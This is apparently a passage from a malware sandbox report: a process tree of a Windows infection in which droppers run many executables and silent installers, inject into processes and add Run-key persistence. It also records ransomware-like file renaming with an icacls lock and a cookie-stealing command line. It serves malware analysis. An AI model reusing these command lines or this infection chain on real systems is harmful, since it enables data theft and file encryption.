                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6256 /prefetch:8
                                                                                  8⤵
                                                                                    PID:3988
                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                    8⤵
                                                                                      PID:5568
                                                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6d22fa890,0x7ff6d22fa8a0,0x7ff6d22fa8b0
                                                                                        9⤵
                                                                                          PID:5388
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6060 /prefetch:8
                                                                                        8⤵
                                                                                          PID:1936
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6040 /prefetch:8
                                                                                          8⤵
                                                                                            PID:5728
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6056 /prefetch:8
                                                                                            8⤵
                                                                                              PID:852
                                                                                        • C:\Users\Admin\Documents\9hjjv6WieGlkSsi4oYlHmyDh.exe
                                                                                          "C:\Users\Admin\Documents\9hjjv6WieGlkSsi4oYlHmyDh.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:2176
                                                                                          • C:\Users\Admin\Documents\9hjjv6WieGlkSsi4oYlHmyDh.exe
                                                                                            C:\Users\Admin\Documents\9hjjv6WieGlkSsi4oYlHmyDh.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5716
                                                                                        • C:\Users\Admin\Documents\VKOmSPk4S7FKrL9SMB1qnmn1.exe
                                                                                          "C:\Users\Admin\Documents\VKOmSPk4S7FKrL9SMB1qnmn1.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:2236
                                                                                          • C:\Users\Admin\Documents\VKOmSPk4S7FKrL9SMB1qnmn1.exe
                                                                                            C:\Users\Admin\Documents\VKOmSPk4S7FKrL9SMB1qnmn1.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5692
                                                                                        • C:\Users\Admin\Documents\4Pe1kpAUtitZAAzbIBY9aAbd.exe
                                                                                          "C:\Users\Admin\Documents\4Pe1kpAUtitZAAzbIBY9aAbd.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:2208
                                                                                          • C:\Users\Admin\Documents\4Pe1kpAUtitZAAzbIBY9aAbd.exe
                                                                                            "{path}"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5180
                                                                                        • C:\Users\Admin\Documents\n_IsMDmJnApkzjiDw0OEDNgS.exe
                                                                                          "C:\Users\Admin\Documents\n_IsMDmJnApkzjiDw0OEDNgS.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4172
                                                                                        • C:\Users\Admin\Documents\fan6T_W9JZld8IEJ8heLikea.exe
                                                                                          "C:\Users\Admin\Documents\fan6T_W9JZld8IEJ8heLikea.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:2328
                                                                                        • C:\Users\Admin\Documents\KctV2wX2TpWa1dbSBcO9y2i_.exe
                                                                                          "C:\Users\Admin\Documents\KctV2wX2TpWa1dbSBcO9y2i_.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4164
                                                                                          • C:\Users\Admin\Documents\KctV2wX2TpWa1dbSBcO9y2i_.exe
                                                                                            C:\Users\Admin\Documents\KctV2wX2TpWa1dbSBcO9y2i_.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1936
                                                                                        • C:\Users\Admin\Documents\8C0KVfoDZvgfuX11ku4kzPxr.exe
                                                                                          "C:\Users\Admin\Documents\8C0KVfoDZvgfuX11ku4kzPxr.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:1092
                                                                                          • C:\Users\Admin\Documents\8C0KVfoDZvgfuX11ku4kzPxr.exe
                                                                                            C:\Users\Admin\Documents\8C0KVfoDZvgfuX11ku4kzPxr.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4752
                                                                                        • C:\Users\Admin\Documents\deOMhSxOkIcXZ0QvKBvP0Xon.exe
                                                                                          "C:\Users\Admin\Documents\deOMhSxOkIcXZ0QvKBvP0Xon.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:2732
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1672
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                1⤵
                                                                                  PID:1256
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                  1⤵
                                                                                    PID:1152
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                    1⤵
                                                                                    • Drops file in System32 directory
                                                                                    PID:1036
                                                                                    • C:\Users\Admin\AppData\Roaming\jfhgrid
                                                                                      C:\Users\Admin\AppData\Roaming\jfhgrid
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2196
                                                                                    • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                      C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                      2⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:7008
                                                                                      • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                        C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                        3⤵
                                                                                        • Modifies extensions of user files
                                                                                        PID:2416
                                                                                    • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                      C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                      2⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:6604
                                                                                      • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                        C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                        3⤵
                                                                                          PID:6916
                                                                                      • C:\Users\Admin\AppData\Roaming\jfhgrid
                                                                                        C:\Users\Admin\AppData\Roaming\jfhgrid
                                                                                        2⤵
                                                                                        • Checks SCSI registry key(s)
                                                                                        PID:7096
                                                                                      • C:\Users\Admin\AppData\Roaming\aahgrid
                                                                                        C:\Users\Admin\AppData\Roaming\aahgrid
                                                                                        2⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:7156
                                                                                        • C:\Users\Admin\AppData\Roaming\aahgrid
                                                                                          C:\Users\Admin\AppData\Roaming\aahgrid
                                                                                          3⤵
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          PID:3172
                                                                                      • C:\Users\Admin\AppData\Roaming\urhgrid
                                                                                        C:\Users\Admin\AppData\Roaming\urhgrid
                                                                                        2⤵
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        PID:5928
                                                                                      • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                        C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                        2⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5392
                                                                                        • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                          C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                          3⤵
                                                                                            PID:4140
                                                                                        • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                          C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                          2⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:6036
                                                                                          • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                            C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                            3⤵
                                                                                              PID:1192
                                                                                          • C:\Users\Admin\AppData\Roaming\aahgrid
                                                                                            C:\Users\Admin\AppData\Roaming\aahgrid
                                                                                            2⤵
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:4192
                                                                                            • C:\Users\Admin\AppData\Roaming\aahgrid
                                                                                              C:\Users\Admin\AppData\Roaming\aahgrid
                                                                                              3⤵
                                                                                                PID:6224
                                                                                            • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                              C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                              2⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:3816
                                                                                              • C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe
                                                                                                C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9\9906.exe --Task
                                                                                                3⤵
                                                                                                  PID:5504
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                              1⤵
                                                                                                PID:336
                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                1⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1676
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                  2⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Checks processor information in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Modifies registry class
                                                                                                  PID:3960
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_7.exe
                                                                                                arnatic_7.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2732
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_7.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_7.exe
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3376
                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                1⤵
                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                PID:5840
                                                                                              • C:\Users\Admin\AppData\Local\Temp\3295.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\3295.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:5356
                                                                                              • C:\Users\Admin\AppData\Local\Temp\344C.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\344C.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:5556
                                                                                              • C:\Users\Admin\AppData\Local\Temp\373B.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\373B.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4724
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5207.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\5207.exe
                                                                                                1⤵
                                                                                                  PID:5648
                                                                                                • C:\Users\Admin\AppData\Local\Temp\9318.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\9318.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:4960
                                                                                                • C:\Users\Admin\AppData\Local\Temp\98B7.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\98B7.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6068
                                                                                                • C:\Users\Admin\AppData\Local\Temp\9906.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\9906.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:6056
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9906.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\9906.exe
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    PID:4320
                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                      icacls "C:\Users\Admin\AppData\Local\33301823-ba38-408f-92e6-7bc5de0592a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                      3⤵
                                                                                                      • Modifies file permissions
                                                                                                      PID:4136
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9906.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\9906.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                      3⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:3588
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9906.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\9906.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                        4⤵
                                                                                                          PID:4868
                                                                                                          • C:\Users\Admin\AppData\Local\fd7aa422-fd9e-43ff-8411-0f1d31a9c48f\build2.exe
                                                                                                            "C:\Users\Admin\AppData\Local\fd7aa422-fd9e-43ff-8411-0f1d31a9c48f\build2.exe"
                                                                                                            5⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5064
                                                                                                            • C:\Users\Admin\AppData\Local\fd7aa422-fd9e-43ff-8411-0f1d31a9c48f\build2.exe
                                                                                                              "C:\Users\Admin\AppData\Local\fd7aa422-fd9e-43ff-8411-0f1d31a9c48f\build2.exe"
                                                                                                              6⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks processor information in registry
                                                                                                              PID:7008
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9BA7.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\9BA7.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5692
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9D0F.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\9D0F.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5544
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\A31B.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\A31B.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:516
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5740
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:4704
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5616
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5560
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5340
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:3188
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B869.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\B869.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks whether UAC is enabled
                                                                                                              PID:4748
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BC23.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\BC23.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5040
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-VLAJ8.tmp\BC23.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-VLAJ8.tmp\BC23.tmp" /SL5="$B01D2,172303,88576,C:\Users\Admin\AppData\Local\Temp\BC23.exe"
                                                                                                                2⤵
                                                                                                                  PID:5288
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-2AFK1.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-2AFK1.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                    3⤵
                                                                                                                    • Drops file in Drivers directory
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:5596
                                                                                                                    • C:\Program Files\Mozilla Firefox\KHEGAGNORT\irecord.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\KHEGAGNORT\irecord.exe" /VERYSILENT
                                                                                                                      4⤵
                                                                                                                        PID:5740
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-BND8G.tmp\irecord.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-BND8G.tmp\irecord.tmp" /SL5="$20280,5808768,66560,C:\Program Files\Mozilla Firefox\KHEGAGNORT\irecord.exe" /VERYSILENT
                                                                                                                          5⤵
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:4276
                                                                                                                          • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                            "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                            6⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:5096
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5d-63d73-5e6-6fdb6-7e1c730579b17\ZHebaefefonae.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5d-63d73-5e6-6fdb6-7e1c730579b17\ZHebaefefonae.exe"
                                                                                                                        4⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        PID:4816
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\50-1e721-513-06385-d1a5318977247\Loshabufymy.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\50-1e721-513-06385-d1a5318977247\Loshabufymy.exe"
                                                                                                                        4⤵
                                                                                                                          PID:5512
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycekssqg.c30\GcleanerEU.exe /eufive & exit
                                                                                                                            5⤵
                                                                                                                              PID:5468
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ogw1h5am.z2a\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                              5⤵
                                                                                                                                PID:3940
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  6⤵
                                                                                                                                    PID:4136
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3pfybt1w.vg3\ifhwwyy.exe & exit
                                                                                                                                  5⤵
                                                                                                                                    PID:5960
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      6⤵
                                                                                                                                        PID:4588
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3pfybt1w.vg3\ifhwwyy.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3pfybt1w.vg3\ifhwwyy.exe
                                                                                                                                        6⤵
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:5524
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                          7⤵
                                                                                                                                            PID:6072
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            7⤵
                                                                                                                                              PID:5256
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\msshookc.sdo\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                          5⤵
                                                                                                                                            PID:4976
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\msshookc.sdo\Setup3310.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\msshookc.sdo\Setup3310.exe /Verysilent /subid=623
                                                                                                                                              6⤵
                                                                                                                                                PID:5036
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-IB0EE.tmp\Setup3310.tmp
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-IB0EE.tmp\Setup3310.tmp" /SL5="$20362,138429,56832,C:\Users\Admin\AppData\Local\Temp\msshookc.sdo\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                                  7⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:1164
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-F9Q5R.tmp\Setup.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-F9Q5R.tmp\Setup.exe" /Verysilent
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    PID:5288
                                                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:5620
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-GI8VK.tmp\LabPicV3.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-GI8VK.tmp\LabPicV3.tmp" /SL5="$4040C,448783,365056,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                          10⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6220
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-62VD8.tmp\758____Dawn.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-62VD8.tmp\758____Dawn.exe" /S /UID=lab214
                                                                                                                                                            11⤵
                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            PID:6456
                                                                                                                                                            • C:\Program Files\Common Files\ESAHTWXZDM\prolab.exe
                                                                                                                                                              "C:\Program Files\Common Files\ESAHTWXZDM\prolab.exe" /VERYSILENT
                                                                                                                                                              12⤵
                                                                                                                                                                PID:5664
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-D0H93.tmp\prolab.tmp
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-D0H93.tmp\prolab.tmp" /SL5="$40442,575243,216576,C:\Program Files\Common Files\ESAHTWXZDM\prolab.exe" /VERYSILENT
                                                                                                                                                                  13⤵
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  PID:6152
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\76-26b8f-7e3-230bd-f4b20aa26c8b1\Kishuqimeci.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\76-26b8f-7e3-230bd-f4b20aa26c8b1\Kishuqimeci.exe"
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:6432
                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                    dw20.exe -x -s 2616
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:6244
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\c9-874d5-e55-eec9c-25a1b12f33a60\Wyjofaenynu.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\c9-874d5-e55-eec9c-25a1b12f33a60\Wyjofaenynu.exe"
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:6300
                                                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                                                                                                                                9⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                PID:1556
                                                                                                                                                                • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  PID:3576
                                                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:1096
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-1C0RQ.tmp\lylal220.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-1C0RQ.tmp\lylal220.tmp" /SL5="$20424,389391,305664,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:6212
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-PGBA3.tmp\ElZané_çé_.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-PGBA3.tmp\ElZané_çé_.exe" /S /UID=lylal220
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      PID:6552
                                                                                                                                                                      • C:\Program Files\Java\TCXGCYMDAE\irecord.exe
                                                                                                                                                                        "C:\Program Files\Java\TCXGCYMDAE\irecord.exe" /VERYSILENT
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:4560
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-Q78CN.tmp\irecord.tmp
